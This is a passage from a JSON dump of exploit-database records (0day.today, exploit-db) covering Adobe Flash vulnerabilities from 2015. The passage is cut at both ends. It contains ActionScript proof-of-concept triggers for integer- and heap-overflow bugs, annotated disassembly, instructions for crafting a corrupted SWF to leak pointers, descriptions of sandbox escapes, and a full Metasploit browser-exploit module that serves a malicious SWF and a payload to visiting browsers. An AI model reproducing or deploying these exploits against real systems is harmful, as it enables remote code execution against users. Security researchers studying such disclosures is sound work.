https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]\r\n \r\nVULNERABILITY DETAILS\r\nAn integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.\r\n \r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n \r\nREPRODUCTION CASE\r\n \r\nFrom exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp\r\n \r\n944 // Specialized to be called from Function.apply(). \r\n945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) \r\n946 { \r\n947 int32_t argc = a->getLength(); \r\n \r\n...\r\n \r\n966 // Tail call inhibited by local allocation/deallocation. \r\n967 MMgc::GC::AllocaAutoPtr _atomv; \r\n968 Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom)); //here if argc = 0xFFFFFFFF we get an integer overflow\r\n969 atomv[0] = thisArg; \r\n970 for (int32_t i=0 ; i < argc ; i++ ) \r\n971 atomv[i+1] = a->getUintProperty(i); \r\n972 return env->coerceEnter(argc, atomv); \r\n973 } \r\n \r\n \r\nSo the idea is to use the rest argument to get a working poc. For example:\r\n \r\n public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {\r\n \r\n try {a0.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a1.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a2.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a3.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a4.writeUnsignedInt(0x41414141)}catch (e) {}\r\n \r\n }\r\n public function XApplyPoc() {\r\n var a:Array = new Array()\r\n \r\n a.length = 0xFFFFFFFF\r\n myFunc.apply(this, a)\r\n }\r\n \r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24085"}, {"lastseen": "2018-01-05T03:22:44", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "KeenTeam", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Flash Broker-Based Sandbox Escape via Unexpected Directory Lock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3083"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24088", "href": "https://0day.today/exploit/description/24088", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\nFlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape\r\n \r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n \r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n \r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.\r\n \r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n \r\n2. Credit\r\nJietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n \r\nProof of Concept:\r\n \r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24088"}, {"lastseen": "2018-03-19T13:17:47", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "KeenTeam", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3082"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24089", "href": "https://0day.today/exploit/description/24089", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\nFlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape\r\n \r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n \r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n \r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers \"\\\" as delimiter. If the destination includes \"/\", FlashBroker will use a wrong destination folder for check.\r\n \r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n \r\n2. Credit\r\nJietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24089"}, {"lastseen": "2018-03-13T23:14:09", "references": [], "edition": 2, "description": "Exploit for windows platform in category dos / poc", "reporter": "Google Security Research", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdt", "title": "Flash AVSS.setSubscribedTags Use After Free Memory Corruption Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3088"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24084", "href": "https://0day.today/exploit/description/24084", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]\r\n \r\nVULNERABILITY DETAILS\r\nUse After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.\r\n \r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n \r\nREPRODUCTION CASE\r\nUse After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.\r\npepflashplayer.dll 17.0.0.134, based at 0x10000000.\r\n \r\nThe setSubscribedTags is handled by sub_103255AD:\r\n \r\n.text:103255AD push ebp\r\n.text:103255AE mov ebp, esp\r\n.text:103255B0 and esp, 0FFFFFFF8h\r\n.text:103255B3 sub esp, 14h\r\n.text:103255B6 push ebx\r\n.text:103255B7 mov ebx, [ebp+arg_0]\r\n.text:103255BA push esi\r\n.text:103255BB push edi\r\n.text:103255BC mov edi, eax\r\n.text:103255BE mov eax, [ebx]\r\n.text:103255C0 mov ecx, ebx\r\n.text:103255C2 call dword ptr [eax+8Ch] ; first get the length of the provided array\r\n.text:103255C8 lea esi, [edi+4Ch]\r\n.text:103255CB mov [esp+20h+var_C], eax\r\n.text:103255CF call sub_103265BB\r\n.text:103255D4 mov esi, [esp+20h+var_C]\r\n.text:103255D8 test esi, esi\r\n.text:103255DA jz loc_1032566D\r\n.text:103255E0 xor ecx, ecx\r\n.text:103255E2 push 4\r\n.text:103255E4 pop edx\r\n.text:103255E5 mov eax, esi\r\n.text:103255E7 mul edx\r\n.text:103255E9 seto cl\r\n.text:103255EC mov [edi+58h], esi\r\n.text:103255EF neg ecx\r\n.text:103255F1 or ecx, eax\r\n.text:103255F3 push ecx\r\n.text:103255F4 call unknown_libname_129 ; and then allocate an array of 4*length\r\n.text:103255F9 and [esp+24h+var_10], 0\r\n.text:103255FE pop ecx\r\n.text:103255FF mov [edi+54h], eax ; that pointer is put at offset 0x54 in the object pointed by edi\r\n \r\n \r\nNext there is a for loop that iterates over the array items and calls the toString() method of each item encountered:\r\n \r\n.text:10325606 loc_10325606:\r\n.text:10325606 mov eax, [edi+8]\r\n.text:10325609 mov eax, [eax+14h]\r\n.text:1032560C mov esi, [eax+4]\r\n.text:1032560F push [esp+20h+var_10]\r\n.text:10325613 mov eax, [ebx]\r\n.text:10325615 mov ecx, ebx\r\n.text:10325617 call dword ptr [eax+3Ch] ; get the ith element\r\n.text:1032561A push eax\r\n.text:1032561B mov ecx, esi\r\n.text:1032561D call sub_1007205D ; call element->toString()\r\n.text:10325622 lea ecx, [esp+20h+var_8]\r\n.text:10325626 push ecx\r\n.text:10325627 call sub_10061703\r\n.text:1032562C mov eax, [esp+20h+var_4]\r\n.text:10325630 inc eax\r\n.text:10325631 push eax\r\n.text:10325632 call unknown_libname_129\r\n.text:10325637 mov edx, [edi+54h]\r\n.text:1032563A pop ecx\r\n.text:1032563B mov ecx, [esp+20h+var_10]\r\n.text:1032563F mov [edx+ecx*4], eax ; write a pointer to the string in the array\r\n...\r\n.text:1032565F inc [esp+20h+var_10]\r\n.text:10325663 mov eax, [esp+20h+var_10]\r\n.text:10325667 cmp eax, [esp+20h+var_C]\r\n.text:1032566B jl short loc_10325606\r\n \r\n \r\nThe issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.\r\n \r\nTrigger with that:\r\n \r\n var avss:flash.media.AVSegmentedSource = new flash.media.AVSegmentedSource ();\r\n \r\n var o:Object = new Object();\r\n o.toString = function():String {\r\n var a = [0,1,2,3];\r\n avss.setSubscribedTags(a);\r\n return \"ahahahahah\"\r\n };\r\n \r\n var a = [o,1,2,3,4,5,6,7,8,9];\r\n var i:uint = 0;\r\n while (i < 0x100000) {\r\n i++;\r\n a.push(i);\r\n }\r\n avss.setSubscribedTags(a);\r\n \r\nNote: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.\r\n \r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.\r\n \r\nMy mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24084"}, {"lastseen": "2018-03-20T01:18:09", "references": [], "description": "This Metasploit module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled.", "edition": 2, "reporter": "metasploit", "published": "2015-06-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Adobe Flash Player ShaderJob Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2015-06-20T00:00:00", "id": "1337DAY-ID-23766", "href": "https://0day.today/exploit/description/23766", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\r\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\r\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\r\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\r\n where the size of the destination buffer and the length of the copy are controlled. This\r\n module has been tested successfully on:\r\n * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.\r\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Chris Evans', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3090'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],\r\n ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23766"}, {"lastseen": "2018-01-27T01:06:58", "references": [], "edition": 2, "description": "Exploit for windows platform in category dos / poc", "reporter": "bilou", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Flash Uninitialized Stack Variable MPD Parsing Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3089"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24083", "href": "https://0day.today/exploit/description/24083", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]\r\n \r\nCredit is to bilou, working with the Chromium Vulnerability Rewards Program.\r\n \r\n---\r\nVULNERABILITY DETAILS\r\nLoading a weird MPD file can corrupt flash player's memory.\r\n \r\nVERSION\r\nChrome version 41.0.2272.101, Flash 17.0.0.134\r\nOperating System: Win 7 x64 SP1\r\n \r\nREPRODUCTION CASE\r\nI'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.\r\n \r\n\"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:\"\r\n \r\n\"http://localhost/PlayManifest.swf?file=gen.mpd\r\n \r\n\"To compile the .as file, I had to use special flags to flex:\"\r\n \r\n\"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as\"\r\n\"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)\"\r\n \r\n \r\nOn Win7 x64 sp1 with Chrome 32 bit, crash like this:\r\n6AA8B67C | 8B C3 | mov eax,ebx |\r\n6AA8B67E | E8 A1 05 00 00 | call pepflashplayer.6AA8BC24 |\r\n6AA8B683 | EB A8 | jmp pepflashplayer.6AA8B62D |\r\n6AA8B685 | 89 88 D0 00 00 00 | mov dword ptr ds:[eax+D0],ecx | // crash here, eax points somewhere in pepflashplayer.dll\r\n6AA8B68B | 8B 88 88 00 00 00 | mov ecx,dword ptr ds:[eax+88] |\r\n6AA8B691 | 33 D2 | xor edx,edx |\r\n6AA8B693 | 3B CA | cmp ecx,edx |\r\n6AA8B695 | 74 07 | je pepflashplayer.6AA8B69E |\r\n6AA8B697 | 39 11 | cmp dword ptr ds:[ecx],edx |\r\n6AA8B699 | 0F 95 C1 | setne cl |\r\n \r\n \r\nAt first sight this looks to be an uninitialized stack variable but I might be wrong.\r\n---\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24083"}, {"lastseen": "2018-01-05T11:18:12", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "KeenTeam", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3081"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24087", "href": "https://0day.today/exploit/description/24087", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/24087"}], "exploitdb": [{"lastseen": "2016-02-04T06:41:45", "osvdbidlist": ["121943"], "references": [], "edition": 1, "description": "Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory. CVE-2015-3093. Dos exploit for windows platform", "reporter": "bilou", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3093"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37846", "href": "https://www.exploit-db.com/exploits/37846/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=326&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=475018]\r\n\r\nCredit is to bilou, working with the Chromium Vulnerability Rewards Program.\r\n\r\n---\r\nVULNERABILITY DETAILS\r\nIssues in DefineBitsLossless and DefineBitsLossless2 leads to using uninitialized memory while rendering a picture. This is caused by the returned value of a zlib function not properly checked.\r\n\r\nVERSION\r\nChrome version 41.0.2272.101, Flash 17.0.0.134 (the code below comes from flash player standalone exe 17.0.0.134)\r\nOperating System: Win 7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\n\r\nCompile the provided poc with flex sdk:\r\nmxmlc -static-link-runtime-shared-libraries=true -compress=false -target-player 15.0 -swf-version 25 XBitmapGif.as\r\n\r\nAnd change the bytes in the DefineBitsLossless2 tag, at offset 0x228:\r\n 14 00 14 00 78 to 14 00 14 00 41\r\n\r\nTo get a DefineBitsLossless tag, change the byte at offset 0x220:\r\n 09 47 00 00 00 to 05 47 00 00 00\r\n \r\nLoad the provided pocs and see the pointers partially disclosed.\r\n \r\nWhen handling such tags, Flash first allocates a buffer according to the picture's width and height but does not initialize it. If the compressed data stream is corrupted, the zlib function just returns an invalid token and Flash leaves the uninitialized buffer as is.\r\n\r\nLook at sub_54732C:\r\n\r\n.text:0054746C loc_54746C:\r\n.text:0054746C mov ecx, [esi]\r\n.text:0054746E push 0 \r\n.text:00547470 push 0 \r\n.text:00547472 push eax \r\n.text:00547473 push [ebp+var_10]\r\n.text:00547476 push [ebp+var_14]\r\n.text:00547479 push [ebp+var_C]\r\n.text:0054747C call sub_545459 ; allocate a buffer of 4 * 14h * 14h = 640h\r\n.text:00547481 cmp [ebp+var_1], 0\r\n.text:00547485 mov ecx, [esi]\r\n.text:00547487 setnz al\r\n.text:0054748A mov [ecx+58h], al\r\n...\r\n.text:005474DE loc_5474DE:\r\n.text:005474DE lea eax, [ebp+var_50]\r\n.text:005474E1 push 0\r\n.text:005474E3 push eax\r\n.text:005474E4 call xinflate ; inflate the buffer, but there's no error check?\r\n.text:005474E9 pop ecx ; thus we can return 0xFFFFFFFD in eax with a corrupt stream\r\n.text:005474EA pop ecx\r\n.text:005474EB cmp eax, 1\r\n.text:005474EE jz short loc_5474FB\r\n.text:005474F0 test eax, eax\r\n.text:005474F2 jnz short loc_54753A ; which will skip the buffer initialization\r\n\r\n\r\nReading this data back is not straightforward. For a DefineBitsLossless tag, we can read values like 0xFFXXYYZZ. For a DefineBitsLossless2 tag an operation is performed on the pixels so we can only read f(pixel). That function is handled by sub_4CD3B0 and uses a hardcoded table. By conbining both the DefineBitsLossless and DefineBitsLossless2 tags I'm quite convinced we can guess a full pointer.\r\n---\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37846.zip\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37846/"}, {"lastseen": "2016-02-04T06:41:20", "osvdbidlist": ["121937"], "references": [], "edition": 1, "description": "Flash Player Integer Overflow in Function.apply. CVE-2015-3087. Dos exploit for windows platform", "reporter": "Google Security Research", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "Flash Player Integer Overflow in Function.apply", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3087"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37843", "href": "https://www.exploit-db.com/exploits/37843/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]\r\n\r\nVULNERABILITY DETAILS\r\nAn integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.\r\n\r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\n\r\nFrom exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp\r\n\r\n944 // Specialized to be called from Function.apply(). \r\n945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) \r\n946 { \r\n947 int32_t argc = a->getLength(); \r\n\r\n...\r\n \r\n966 // Tail call inhibited by local allocation/deallocation. \r\n967 MMgc::GC::AllocaAutoPtr _atomv; \r\n968 Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom)); //here if argc = 0xFFFFFFFF we get an integer overflow\r\n969 atomv[0] = thisArg; \r\n970 for (int32_t i=0 ; i < argc ; i++ ) \r\n971 atomv[i+1] = a->getUintProperty(i); \r\n972 return env->coerceEnter(argc, atomv); \r\n973 } \r\n\r\n\r\nSo the idea is to use the rest argument to get a working poc. For example:\r\n\r\n public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {\r\n \r\n try {a0.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a1.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a2.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a3.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a4.writeUnsignedInt(0x41414141)}catch (e) {}\r\n \r\n }\r\n public function XApplyPoc() {\r\n var a:Array = new Array()\r\n \r\n a.length = 0xFFFFFFFF\r\n myFunc.apply(this, a)\r\n }\r\n\r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37843/"}, {"lastseen": "2016-02-04T05:40:57", "osvdbidlist": ["121940"], "references": [], "description": "Adobe Flash Player ShaderJob Buffer Overflow. CVE-2015-3090. Remote exploits for multiple platform", "edition": 1, "reporter": "metasploit", "published": "2015-06-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Adobe Flash Player ShaderJob Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2015-06-24T00:00:00", "id": "EDB-ID:37368", "href": "https://www.exploit-db.com/exploits/37368/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\r\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\r\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\r\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\r\n where the size of the destination buffer and the length of the copy are controlled. This\r\n module has been tested successfully on:\r\n * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 